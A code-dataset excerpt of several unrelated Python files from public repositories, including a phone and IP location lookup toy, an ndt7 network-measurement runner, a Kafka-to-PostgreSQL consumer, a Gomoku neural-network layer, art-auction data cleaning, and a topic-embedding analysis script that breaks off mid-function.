15), relief=\"flat\")\n self.track_button = Button(App, text=\"Track Country\", bg=\"#22c1c3\", relief=\"sunken\")\n self.country_label = Label(App,fg=\"white\", font=(\"Times\", 20), bg=\"#3f5efb\")\n \n #___________Place widgets on the window______\n self.phone_number.place(x=170, y=120)\n self.track_button.place(x=200, y=200)\n self.country_label.place(x=100, y=280)\n \n #__________Linking button with countries ________\n self.track_button.bind(\"\", self.Track_location)\n #255757294146\n \n def Track_location(self,event):\n phone_number = self.phone_number.get()\n country = \"Country is Unknown\"\n if phone_number:\n tracked = pycountry.countries.get(alpha_2=phone_country(phone_number))\n print(tracked)\n if tracked:\n if hasattr(tracked, \"official_name\"):\n country = tracked.official_name\n else:\n country = tracked.name\n self.country_label.configure(text=country)\n \n \n \n PhoneTracker = Tk()\n MyApp = Location_Tracker(PhoneTracker)\n PhoneTracker.mainloop()\n\ndef ip_info():\n \n\n ## single ip request\n response = requests.get(\"http://ip-api.com/json/24.48.0.1\").json()\n #\n print(response['lat'])\n print(response['lon'])\n\n # batch ip request\n\n response = requests.post(\"http://ip-api.com/batch\", json=[\n {\"query\": \"103.120.203.180\"},\n ]).json()\n\n for ip_info in response:\n for k,v in ip_info.items():\n print(k,v)\n print(\"\\n\")\n\n\nwhile(1):\n print(\"1. Number Details \\n2. Number Details from user \\n3. IP Location track\\n\")\n a = int(input(\"Chose One : \"))\n if a==1:\n number_details1()\n elif a==2:\n number_details2()\n elif a==3:\n ip_info()\n ","repo_name":"SAZZAD-AMT/NUMBER-TRACE-USING-PYTHON","sub_path":"locationtrace.py","file_name":"locationtrace.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4899661077","text":"import logging\nimport shutil\nimport subprocess\nimport uuid\nimport json\nimport datetime\nimport pkg_resources\n\nfrom murakami.errors import RunnerError\nfrom murakami.runner import MurakamiRunner\n\nlogger = logging.getLogger(__name__)\n\n\nclass Ndt7ClientCustom(MurakamiRunner):\n \"\"\"Run ndt7 test.\"\"\"\n def __init__(self, config=None, data_cb=None,\n location=None, network_type=None, connection_type=None,\n device_id=None):\n super().__init__(\n title=\"ndt7custom\",\n description=\"The Network Diagnostic Tool v7 test.\",\n config=config,\n data_cb=data_cb,\n location=location,\n network_type=network_type,\n connection_type=connection_type,\n device_id=device_id\n )\n\n self._server_selection = {}\n\n # Load all the available server selection algorithms.\n for entry_point in pkg_resources.iter_entry_points(\n \"murakami.selection\"\n ):\n self._server_selection[entry_point.name] = entry_point.load()()\n\n def _run_client(self, args):\n starttime = datetime.datetime.utcnow()\n output = subprocess.run(\n args,\n text=True,\n capture_output=True,\n )\n endtime = datetime.datetime.utcnow()\n\n murakami_output = {\n 'TestName': \"ndt7\",\n 'TestStartTime': starttime.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'TestEndTime': endtime.strftime('%Y-%m-%dT%H:%M:%S.%f'),\n 'MurakamiLocation': self._location,\n 'MurakamiConnectionType': self._connection_type,\n 'MurakamiNetworkType': self._network_type,\n 'MurakamiDeviceID': self._device_id,\n }\n\n if output.returncode == 0:\n # Parse ndt7 summary.\n summary = {}\n try:\n summary = json.loads(output.stdout)\n except json.JSONDecodeError:\n raise RunnerError(\n 'ndt7-client',\n 'ndt7-client did not return a valid JSON summary.'\n )\n logger.info(\"ndt7 test completed successfully.\")\n\n # Parse ndt7-client-go's summary JSON and generate Murakami's\n # output format.\n download = summary.get('Download')\n upload = summary.get('Upload')\n\n murakami_output['ServerName'] = summary.get('ServerFQDN')\n murakami_output['ServerIP'] = summary.get('ServerIP')\n murakami_output['ClientIP'] = summary.get('ClientIP')\n murakami_output['DownloadUUID'] = download.get('UUID')\n if download is not None:\n throughput = download.get(\"Throughput\")\n if throughput is not None:\n murakami_output['DownloadValue'] = throughput.get('Value')\n murakami_output['DownloadUnit'] = throughput.get('Unit')\n murakami_output['DownloadError'] = None\n retransmission = download.get(\"Retransmission\")\n if retransmission is not None:\n murakami_output['DownloadRetransValue'] = retransmission.get('Value')\n murakami_output['DownloadRetransUnit'] = retransmission.get('Unit')\n latency = download.get(\"Latency\")\n if latency is not None:\n murakami_output['MinRTTValue'] = latency.get('Value')\n murakami_output['MinRTTUnit'] = latency.get('Unit')\n if upload is not None:\n throughput = download.get(\"Throughput\")\n if throughput is not None:\n murakami_output['UploadValue'] = throughput.get('Value')\n murakami_output['UploadUnit'] = throughput.get('Unit')\n murakami_output['UploadError'] = None\n else:\n logger.warn(\"ndt7 test completed with errors.\")\n\n # Parse error line(s) and generate summary with UploadError and\n # DownloadError only, if available.\n errors = output.stdout.splitlines()\n for j in errors:\n try:\n message = json.loads(j)\n if message['Value']['Test'] == 'upload':\n murakami_output['UploadError'] = (\n message['Value']['Failure']\n )\n elif message['Value']['Test'] == 'download':\n murakami_output['DownloadError']= (\n message['Value']['Failure']\n )\n except Exception as exc:\n logger.error(\"Cannot parse error message: %s\", exc)\n\n # All the other fields are set to None (which will become null\n # in the JSON.)\n murakami_output['ServerName'] = None\n murakami_output['ServerIP'] = None\n murakami_output['ClientIP'] = None\n murakami_output['DownloadUUID'] = None\n murakami_output['DownloadValue'] = None\n murakami_output['DownloadUnit'] = None\n murakami_output['UploadValue'] = None\n murakami_output['UploadUnit'] = None\n murakami_output['DownloadRetransValue'] = None\n murakami_output['DownloadRetransUnit'] = None\n murakami_output['RTTValue'] = None\n murakami_output['RTTUnit'] = None\n \n return json.dumps(murakami_output)\n\n def _start_test(self):\n logger.info(\"Starting ndt7 test...\")\n\n # Check that a configuration file has been specified\n if \"config\" not in self._config:\n raise RunnerError(\n 'ndt7custom',\n 'No configuration file specified for the custom runner, \\\n skipping.')\n \n # Check that the ndt7-client executable is available.\n if shutil.which('ndt7-client') is None:\n raise RunnerError(\n 'ndt7custom',\n \"Executable ndt7-client does not exist, please install ndt7-client-go.\",\n )\n\n custom_config = {}\n try:\n with open(self._config['config']) as config_file:\n custom_config = json.load(config_file)\n except IOError as err:\n raise RunnerError(\n 'ndt7custom',\n 'Cannot open the custom configuration file: ' + str(err))\n \n # Get all the servers to run measurements against from the config,\n # applying the corresponding selection algorithm.\n servers = set()\n for group in custom_config.get('serverGroups', []):\n # the default selection algorithm is 'random'\n selection = group.get('selection', 'random')\n if selection not in self._server_selection:\n raise RunnerError(\n 'ndt7custom',\n 'Invalid server selection algorithm specified:' +\n selection)\n\n servers = servers | self._server_selection[selection].get_servers(\n group.get('servers', []))\n\n # Run a measurement against each of the selected servers.\n results = []\n for server in servers:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n \"-server=\" + server\n ]\n \n insecure = self._config.get('insecure', True)\n if insecure:\n cmdargs.append('-no-verify')\n \n logger.info(\"Running ndt7custom measurement (server): \" + server)\n results.append(self._run_client(cmdargs))\n \n # Check for additional countries/regions specified and run the client\n # using the locate service for each of them.\n countries = custom_config.get('countries', [])\n for country in countries:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n \"-locate.url=https://locate.measurementlab.net/v2/nearest/?country=\" + country\n ]\n logger.info(\"Running ndt7custom measurement (country): \" + country)\n results.append(self._run_client(cmdargs))\n \n regions = custom_config.get('regions', [])\n for region in regions:\n cmdargs = [\n \"ndt7-client\",\n \"-format=json\",\n \"-quiet\",\n \"-scheme=ws\",\n \"-locate.url=https://locate.measurementlab.net/v2/nearest/?region=\" + region\n ]\n logger.info(\"Running ndt7custom measurement (region): \" + region)\n results.append(self._run_client(cmdargs))\n\n return results\n \n","repo_name":"m-lab/murakami","sub_path":"murakami/runners/ndt7custom.py","file_name":"ndt7custom.py","file_ext":"py","file_size_in_byte":8793,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"26538534796","text":"import sys\nimport psycopg2\nimport psycopg2.extras\nfrom pgcopy import CopyManager\nfrom confluent_kafka import Consumer \nimport logging\nfrom collections import defaultdict\nimport json\nimport msgpack\nfrom datetime import datetime\nfrom iso3166 import countries\n\n\nclass saverPostgresql(object):\n \"\"\"Dumps hegemony results to a Postgresql database. \"\"\"\n\n def __init__(self, af, host=\"localhost\", dbname=\"ihr\"):\n\n self.prevts = 0 \n self.af = int(af)\n self.dataHege = [] \n self.cpmgr = None\n self.continents = {\n 'EU': 'European Union',\n 'AP': 'Asia-Pacific'\n }\n\n conn_string = \"host='127.0.0.1' dbname='%s'\" % dbname\n\n self.conn = psycopg2.connect(conn_string)\n columns=(\"timebin\", \"country_id\", \"asn_id\", \"hege\", \"af\", \"weight\", \"weightscheme\", \"transitonly\")\n self.cpmgr = CopyManager(self.conn, 'ihr_hegemony_country', columns)\n self.cursor = self.conn.cursor()\n logging.debug(\"Connected to the PostgreSQL server\")\n\n self.consumer = Consumer({\n 'bootstrap.servers': 'kafka1:9092, kafka2:9092, kafka3:9092',\n 'group.id': 'ihr_hegemony_countries_psql_sink_ipv{}'.format(self.af),\n 'auto.offset.reset': 'earliest',\n })\n\n self.consumer.subscribe(['ihr_hegemony_countries_ipv{}'.format(self.af)])\n\n self.updateCountries()\n\n def run(self):\n \"\"\"\n Consume data from the kafka topic and save it to the database.\n \"\"\"\n\n while True:\n msg = self.consumer.poll(10.0)\n if msg is None:\n self.commit()\n continue\n\n if msg.error():\n logging.error(\"Consumer error: {}\".format(msg.error()))\n continue\n\n msg_val = msgpack.unpackb(msg.value(), raw=False)\n\n self.save(msg_val)\n\n def updateCountries(self):\n '''\n Get the list of countries from the database\n '''\n\n self.cursor.execute(\"SELECT code FROM ihr_country\")\n self.countries = set([x[0] for x in self.cursor.fetchall()])\n logging.debug(\"%s counties registered in the database\" % len(self.countries))\n\n\n def save(self, msg):\n \"\"\"\n Buffer the given message and make sure corresponding ASNs are \n registered in the database.\n \"\"\"\n\n if 'ts' not in msg:\n print(msg)\n # Update the current bin timestamp\n if self.prevts != msg['ts']:\n self.commit()\n self.prevts = msg['ts']\n self.currenttime = datetime.utcfromtimestamp(msg['ts'])\n logging.debug(\"start recording country hegemony\")\n\n\n # Update seen countries\n if msg['cc'] not in self.countries:\n self.countries.add(msg['cc'])\n if msg['cc'] in self.continents:\n country_name = self.continents[msg['cc']]\n else:\n country_name = countries.get(msg['cc']).name\n\n logging.warning(\"psql: add new country %s: %s\" % (msg['cc'], country_name))\n self.cursor.execute(\n \"INSERT INTO ihr_country(code, name, tartiflette, disco ) \\\n select %s, %s, FALSE, FALSE \\\n WHERE NOT EXISTS ( SELECT code FROM ihr_country WHERE code = %s)\", \n (msg['cc'], country_name, msg['cc']))\n\n # Hegemony values to copy in the database\n if msg['hege']!= 0:\n self.dataHege.append((self.currenttime, msg['cc'], int(msg['asn']), \n float(msg['hege']), self.af, msg['original_weight'], msg['weight'].lower(), msg['transit_only']))\n\n\n def commit(self):\n \"\"\"\n Push buffered messages to the database and flush the buffer.\n \"\"\"\n\n if len(self.dataHege) == 0:\n return\n\n logging.warning(\"psql: start copy\")\n self.cpmgr.copy(self.dataHege)\n self.conn.commit()\n logging.warning(\"psql: end copy\")\n\n self.dataHege = []\n self.updateCountries()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv)<2:\n print(\"usage: %s af\" % sys.argv[0])\n sys.exit()\n\n FORMAT = '%(asctime)s %(processName)s %(message)s'\n logging.basicConfig(format=FORMAT, filename='ihr-kafka-psql-HegemonyCountry.log', level=logging.WARN, datefmt='%Y-%m-%d %H:%M:%S')\n logging.warning(\"Started: %s\" % sys.argv)\n\n af = int(sys.argv[1])\n ss = saverPostgresql(af)\n ss.run()\n\n","repo_name":"InternetHealthReport/kafka-toolbox","sub_path":"psql/consumers/CountryHegemony.py","file_name":"CountryHegemony.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27849492996","text":"def solution(X, Y):\n result = ''\n for i in range(9,-1,-1):\n result += str(i)*min(X.count(str(i)), Y.count(str(i)))\n if result == '':\n return \"-1\"\n elif len(result) == result.count(\"0\"):\n return \"0\"\n else:\n return result","repo_name":"miracle-21/algorithm","sub_path":"프로그래머스/lv1/131128. 숫자 짝꿍/숫자 짝꿍.py","file_name":"숫자 짝꿍.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71468862201","text":"from typing import Callable\nimport tensorflow as tf\nimport numpy as np\n\nfrom aegomoku.policies.radial import radial_3xnxn, radial_2xnxn\n\n\nclass MaxInfluencePolicyParams:\n def __init__(self, board_size, radial_constr, radial_obstr, sigma, iota):\n self.board_size = board_size\n self.radial_constr = radial_constr\n self.radial_obstr = radial_obstr\n self.sigma = sigma\n self.iota = iota\n\n\nclass NaiveInfluenceLayer(tf.keras.layers.Layer, Callable):\n\n def __init__(self, board_size):\n\n super().__init__()\n params = MaxInfluencePolicyParams(\n board_size=board_size,\n sigma=.7,\n iota=3,\n radial_constr=[.0625, .125, .25, .5],\n radial_obstr=[-.0625, -.125, -.25, -.5]\n )\n self.params = params\n self.input_size = board_size + 2\n self.kernel_size = 2 * len(self.params.radial_constr) + 1\n self.filters = None\n self.biases = None\n self.occupied_suppression = -100.\n\n self.potential = self.create_layers()\n\n\n def call(self, sample):\n # add two more channels filled with zeros. They'll be carrying the 'influence' of the surrounding stones.\n # That allows for arbitrarily deep chaining within our architecture\n n = self.input_size\n extended = np.concatenate([sample, np.zeros((1, n, n, 2))], axis=3) # .reshape((-1, n, n, 5))\n\n y = self.potential(extended)\n y = self.potential(y)\n y = self.potential(y)\n return y\n\n\n def create_layers(self):\n self.construct_filters()\n\n # Compute the current player's total potential, can be arbitrarily repeated\n # to create some forward-looking capabilities\n potential = tf.keras.layers.Conv2D(\n filters=5, kernel_size=self.kernel_size,\n kernel_initializer=tf.constant_initializer(self.filters),\n bias_initializer=tf.constant_initializer(self.biases),\n activation=tf.nn.relu,\n padding='same',\n input_shape=(self.input_size, self.input_size, 5))\n\n return potential\n\n\n def construct_filters(self):\n \"\"\"\n Five filters with five channels each. Like a 5x5 dense over each position.\n Two filters compute the influence, the others just project the input forward.\n This is designed so to give each layer the information about where exactly the stones are.\n I believe that's ok for a early-disposed heuristic auxiliary\n :return:\n \"\"\"\n len_radial = len(self.params.radial_constr)\n\n # Determine the current player's offensive potential\n inf_stones_curr = radial_3xnxn(self.params.radial_constr, self.params.radial_obstr, self.params.radial_obstr,\n self.occupied_suppression, self.occupied_suppression, self.occupied_suppression,\n gamma=1.0)\n inf_inf_curr = radial_2xnxn(self.params.radial_constr, self.params.radial_obstr,\n .9, .9, # discounting for 2nd order influence\n gamma=.9) # discounting for the time lag of the opponent - it's me first\n inf_curr = np.concatenate([inf_stones_curr, inf_inf_curr], axis=2)\n\n #\n # Determine the other player's offensive potential (to determine the need of defense)\n inf_stones_oth = radial_3xnxn(self.params.radial_obstr, self.params.radial_constr, self.params.radial_obstr,\n self.occupied_suppression, self.occupied_suppression, self.occupied_suppression,\n gamma=1.0)\n inf_inf_oth = radial_2xnxn(self.params.radial_obstr, self.params.radial_constr,\n .9, .9, # discounting for 2nd order influence\n gamma=.9) # discounting for the time lag of my next move - it's him/her first\n inf_oth = np.concatenate([inf_stones_oth, inf_inf_oth], axis=2)\n\n #\n # Projectors simply pass the stone channels through to the next layer\n zero = radial_2xnxn([0] * len_radial, None, 0, 0)\n\n proj_cur = radial_3xnxn([0] * len_radial, None, None, 1, 0, 0)\n proj_cur = np.concatenate([proj_cur, zero], axis=2)\n\n proj_oth = radial_3xnxn([0] * 4, None, None, 0, 1, 0)\n proj_oth = np.concatenate([proj_oth, zero], axis=2)\n\n proj_bnd = radial_3xnxn([0] * 4, None, None, 0, 0, 1)\n proj_bnd = np.concatenate([proj_bnd, zero], axis=2)\n\n filters = [proj_cur, proj_oth, proj_bnd, inf_curr, inf_oth]\n self.biases = [0.] * len(filters)\n filters = np.stack(filters, axis=3)\n self.filters = np.reshape(filters, (self.kernel_size, self.kernel_size, 5, 5))\n","repo_name":"Project-Ellie/DeepGomoku","sub_path":"aegomoku/policies/naive_infuence.py","file_name":"naive_infuence.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26959393521","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport re\n\n\n# In[7]:\n\n\nfile = 'topartistsoverall2016.csv'\n\n\n# In[11]:\n\n\nimport csv\ndef get_data(file):\n file = file\n artists = []\n with open(file) as fh:\n rd = csv.DictReader(fh, delimiter = ',')\n for row in rd:\n artists.append(row)\n return artists\n\n\n# In[15]:\n\n\nx = get_data(file)\nx[:2]\n\n\n# In[14]:\n\n\ntitles2015 = ['Rank', 'Artist', 'Turnover', 'Sold lots', 'Top Auction Result']\n\n\n# In[43]:\n\n\ndef clean_data(read_file, year):\n return_list = []\n for artist in read_file:\n new_item = {}\n new_item['Rank'] = int(artist['A'])\n name_date = artist['B'].title().split('(')\n new_item['Name'] = name_date[0].split()\n years = name_date[-1].strip('()').split('-')\n new_item['Life'] = years\n new_item['TotalSold'] = int(re.sub(\"[^0-9]\", \"\", artist['C']))\n new_item['TotalLots'] = int(re.sub(\"[^0-9]\", \"\", artist['D']))\n new_item['MaxPrice'] = int(re.sub(\"[^0-9]\", \"\", artist['E']))\n new_item['SaleYear'] = year\n return_list.append(new_item)\n return return_list\n\n\n# In[44]:\n\n\nclean2015top500 = clean_data(x, 2015)\n\n\nfile1 = '2014top500.csv'\ny = get_data(file1)\nclean2014top500 = clean_data(y, 2014)\n\n\nfile2 = '2009500.csv'\nz = get_data(file2)\n\n\ndef clean_data_extended(read_file, year):\n return_list = []\n for artist in read_file:\n new_item = {}\n new_item['Rank'] = int(artist['A'])\n name_date = artist['B'].title().split('(')\n new_item['Name'] = list(reversed(name_date[0].split()))\n years = name_date[-1].strip('()').split('-')\n new_item['Life'] = years\n new_item['TotalSold'] = int(re.sub(\"[^0-9]\", \"\", artist['C']))\n new_item['TotalLots'] = int(re.sub(\"[^0-9]\", \"\", artist['E']))\n new_item['MaxPrice'] = int(re.sub(\"[^0-9]\", \"\", artist['G']))\n new_item['SaleYear'] = year\n return_list.append(new_item)\n return return_list\n\n\n\nclean2009top500 = clean_data_extended(z, 2009)\n\n\ndef clean_extended(data):\n for artist in data:\n if artist['Name'][-1].isdigit():\n artist['Name'].pop()\n\n\nclean_extended(clean2009top500)\n\nfile3 = '2008500.csv'\nw = get_data(file3)\nclean2008top500 = clean_data_extended(w, 2008)\n\nclean_extended(clean2008top500)\n","repo_name":"vaeb80/Top-500-Art-Project","sub_path":"csv_clean_etc/artists2008091415.py","file_name":"artists2008091415.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74340664120","text":"import numpy as np\n\n\nfrom signal_processing.extensions import plt_extension\n\ndef visual_test_plot_with_labels():\n x = np.arange(10)\n y = np.arange(10)\n x_label = \"x\"\n curv_label = \"curv\"\n plt_extension.plot_with_labels(x, y, x_label, curv_label)\n\n\n\"\"\"\ndef visual_test_plot_quick():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.volt\n sig = ContinuousData(vals, t)\n plot_quick(sig)\n\n#visual_test_plot_quick()\n\ndef visual_test_plot():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.volt\n sig = ContinuousData(vals, t)\n plot(sig)\n\n# visual_test_plot_quick()\n\ndef visual_test_plot_under():\n t = np.arange(10) * U_.sec\n vals = np.arange(10) * U_.amp\n sig = ContinuousData(vals, t)\n sig_2 = sig\n sig_list = [sig, sig_2]\n plot_under(sig_list)\n\n\"\"\"\n","repo_name":"tromer/signal_processing","sub_path":"signal_processing/tests/test_extensions/test_plt_extension.py","file_name":"test_plt_extension.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1526562469","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 16 20:02:33 2023\n\n@author: aixuexi\n\"\"\"\nimport re\nimport os\nimport sys\nimport math\nimport json\nimport time as time_lib\nimport pickle\nimport random\nimport multiprocessing\nimport pandas as pd\nimport numpy as np\nimport prettytable as pt\nimport seaborn as sns \nimport matplotlib.pyplot as plt \nimport matplotlib as mpl\nimport matplotlib.ticker as mtick\nfrom matplotlib.colors import Normalize\nfrom tqdm import tqdm\nfrom sklearn import decomposition\nfrom matplotlib import rcParams\nfrom adjustText import adjust_text \n\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import norm\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nfrom sklearn.decomposition import PCA\nfrom scipy.sparse import coo_matrix, csr_matrix\n\nimport torch\nfrom transformers import BertConfig, BertModel, BertTokenizer, AutoTokenizer\n\nimport tslearn\nfrom tslearn.metrics import dtw, dtw_path\nfrom tslearn.clustering import TimeSeriesKMeans\nfrom tslearn.generators import random_walks\nfrom tslearn.preprocessing import TimeSeriesScalerMeanVariance, TimeSeriesResampler\n\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom statsmodels.datasets import grunfeld\nfrom linearmodels.panel import PanelOLS\nfrom linearmodels.panel import PooledOLS\nfrom linearmodels.datasets import wage_panel\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\n\nfrom Utils import save_file, read_file, abs_file_path\nfrom CalculateMetrics import get_vec_func, calculate_self_similarity_func, maximum_explainable_variance_func, calculate_self_distance_func\n\n\n\n#%%\n\"\"\" \n Section 5.1\n Checking the quality of topic embeedings \n Show and exclude Anisotropy in our metrics\n\"\"\"\nFoS2Vec_path = os.path.join(abs_file_path, \"FoS2Vec\")\nFoSs = os.listdir(FoS2Vec_path)\n\n\ndef sampling_control_group(beg_year, end_year):\n \"\"\" random sample embeddings from different topics to cnostruct vectors pool \"\"\"\n FoS2Vec_path = os.path.join(abs_file_path, \"FoS2Vec\")\n FoSs = os.listdir(FoS2Vec_path)\n sampling_size_2 = 100\n vecs_2 = list()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, beg_year, end_year)\n if len(vecs) == 0:\n continue\n if len(vecs) <= sampling_size_2:\n vecs_2.append(vecs)\n else:\n selected_index = np.arange(len(vecs))\n random.shuffle(selected_index)\n selected_index = selected_index[:sampling_size_2]\n vecs_2.append(vecs[selected_index, :])\n vecs_2 = np.concatenate(vecs_2, axis=0)\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n vecs_2 = vecs_2[shuffle_index, :]\n save_file(vecs_2, \"./temp/vecs_2.pkl\")\n\n\ndef check_for_anisotropy_from_self_similarity(sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio):\n \"\"\" demostrate the anisotropy in the topic embeddings \"\"\"\n # 说明 相同FoS的向量相似性 > 不同FoS的向量相似性\n\n path_same = \"./temp/self_sim_same_dis.pkl\"\n path_diff = \"./temp/self_sim_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n self_sim_same_dis = read_file(path_same)\n self_sim_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n self_sim_same_dis = dict()\n self_sim_diff_dis = dict()\n for fid in tqdm(FoSs):\n # fid = 'artificial neural network.pkl'\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n self_sim_same_dis[fid] = calculate_self_similarity_func(vecs, vecs, True, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n self_sim_diff_dis[fid] = calculate_self_similarity_func(vecs, vecs_2, False, sampling_size_1, max_mp_num, min_sampling_times, max_sampling_times, sampling_discount_ratio)\n save_file(self_sim_same_dis, path_same)\n save_file(self_sim_diff_dis, path_diff)\n\n # 绘制分布\n x = list(self_sim_diff_dis.keys())\n y_diff = np.array([self_sim_diff_dis[i] for i in x])\n y_same = np.array([self_sim_same_dis[i] for i in x])\n y_sub = y_same - y_diff\n \n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$SSIM(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n sns.distplot(y_sub, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'blue', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.5, \"label\": r\"$SSIM(V_j(:t))$ - $SSIM(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"KDE\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05}, # fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"}\n ax = ax1)\n ax2 = plt.twinx()\n ax2 = sns.distplot(y_diff, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'gray', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": \"$SSIM(V_j(:t), \\widehat{V_j(:t)})$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n # rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n # fit_kws = {\"color\": \"black\",\"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"\"},\n ax=ax2)\n\n \n ax1.set_xlabel(r\"Self similarity ($t$=2018)\")\n ax1.set_ylabel(\"Density\")\n ax2.set_ylabel(\"\")\n ax1.legend(loc='upper left', frameon=False, fontsize=15)\n ax2.legend(loc='upper right', frameon=False, fontsize=15)\n ax1.set_xticks(np.arange(0, 1.1, 0.1))\n ax1.set_xlim(0, 1)\n ax1.set_yticks(np.arange(0, 35, 5))\n ax2.set_yticks(np.arange(0, 35, 5))\n ax2.tick_params(axis='y',colors='gray')\n\n\ndef check_for_anisotropy_from_maximum_explainable_variance():\n \"\"\" demostrate the anisotropy in the topic embeddings \"\"\"\n # 说明相同FoS的向量的MER更大\n \n path_same = \"./temp/mer_same_dis.pkl\"\n path_diff = \"./temp/mer_diff_dis.pkl\"\n path_rand = \"./temp/vecs_2.pkl\" # 随机向量池\n \n if os.path.exists(path_same) and os.path.exists(path_diff):\n mer_same_dis = read_file(path_same)\n mer_diff_dis = read_file(path_diff)\n else:\n if os.path.exists(path_rand):\n vecs_2 = read_file(path_rand)\n else:\n vecs_2 = sampling_control_group(1990, 2018)\n \n thresh = 100\n mer_same_dis = dict() \n mer_diff_dis = dict()\n for fid in tqdm(FoSs):\n dic = read_file(os.path.join(FoS2Vec_path, fid))\n vecs = get_vec_func(dic, 1990, 2018)\n if len(vecs) >= thresh: \n # 实验组\n mer_same_dis[fid] = maximum_explainable_variance_func(vecs)\n # 对照组\n shuffle_index = np.arange(len(vecs_2))\n random.shuffle(shuffle_index)\n control_size = min(len(vecs), len(vecs_2))\n shuffle_index = shuffle_index[:control_size]\n mer_diff_dis[fid] = maximum_explainable_variance_func(vecs_2[shuffle_index, :])\n save_file(mer_same_dis, path_same)\n save_file(mer_diff_dis, path_diff)\n\n # 绘制分布\n x = list(mer_diff_dis.keys())\n y_diff = np.array([mer_diff_dis[i] for i in x]) # control group - random sampling\n y_same = np.array([mer_same_dis[i] for i in x]) # test group\n y_sub = y_same - y_diff\n\n fig = plt.figure(figsize=(8, 6))\n plt.rcParams['savefig.dpi'] = 300\n plt.rcParams['figure.dpi'] = 300\n config = {\n \"font.family\" : \"Times New Roman\",\n \"font.size\" : 20\n }\n rcParams.update(config)\n \n ax1 = sns.distplot(y_same, hist=True, kde=True, rug=False,\n bins=15,\n # fit=norm,\n hist_kws = {'rwidth':1, 'color':'lime', \"edgecolor\":\"white\", \"histtype\": \"bar\", 'linewidth':1, 'alpha':0.75, \"label\": r\"$MEV(V_j(:t))$\"},\n kde_kws = {\"color\": \"red\", \"alpha\":0.5, \"linewidth\": 3, \"shade\":False, \"label\": \"\"},\n #rug_kws = {\"color\": \"black\", \"alpha\":0.25, \"linewidth\": 0.01, \"height\":0.05},\n #fit_kws = {\"color\": \"black\", \"alpha\": 0.25, \"linewidth\": 2, \"linestyle\": \"--\", \"label\": \"Normal\"},\n )\n 